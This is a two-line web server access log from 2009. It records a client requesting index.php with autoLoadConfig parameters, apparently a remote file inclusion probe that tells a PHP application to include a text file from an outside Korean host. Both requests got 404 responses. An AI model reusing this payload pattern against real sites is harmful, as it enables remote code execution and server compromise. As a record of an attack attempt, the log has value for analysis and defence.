218.234.21.178 - - [13/Oct/2009:00:58:39 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.234.21.178 - - [13/Oct/2009:00:58:40 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
